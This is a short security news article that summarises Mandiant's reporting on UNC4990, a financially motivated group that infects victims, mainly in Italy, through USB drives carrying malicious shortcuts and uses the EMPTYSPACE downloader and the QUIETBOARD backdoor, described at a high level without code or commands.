UNC4990: A Threat Actor with a USB Trick up Its Sleeve
In the shadowy world of cyber threats, UNC4990 emerges as a unique actor. This group, identified by Mandiant Managed Defense, stands out for its focus on USB devices as the primary infection vector. Since at least 2020, UNC4990 has been actively targeting users, mainly in Italy, driven by financial incentives.
UNC4990’s strategy revolves around the classic tactic of weaponizing USB drives. However, their approach is anything but outdated. They’ve evolved from using simple encoded text files to leveraging popular websites like Ars Technica, GitHub, GitLab, and Vimeo for hosting malicious payloads.
Infection chain | Image: Mandiant
The infection begins unsuspectingly – a victim clicks a malicious LNK shortcut on a removable USB drive, disguised cleverly with common vendor names and storage sizes. This simple action triggers a chain of malicious activities, starting with the execution of an encoded PowerShell script.
UNC4990 threat actor utilizes sophisticated tools like EMPTYSPACE, a versatile downloader, and QUIETBOARD, a multifunctional backdoor. These tools exemplify the group’s capability to execute various payloads and maintain persistent control over compromised systems.
The analysis reveals a modular and evolving approach in UNC4990’s operations. Their malware framework, QUIETBOARD, began with a single module and gradually incorporated more functionalities. This gradual evolution signifies the group’s adaptability and growing sophistication.
“It is unclear whether UNC4990 is responsible only for initial access and foothold. In at least one investigation, Mandiant has observed the deployment of a Coinminer following months of inactivity, leaving the end goal for UNC4990 operations open,” the researcher said.
UNC4990’s story is a testament to the dynamic nature of cyber threats. Their journey from a simple USB-based attack to a multifaceted campaign leveraging multiple websites for payload hosting underscores the need for constant vigilance and adaptive security strategies. This actor not only highlights the enduring relevance of physical device vulnerabilities but also showcases the ingenuity employed in modern cybercrime.
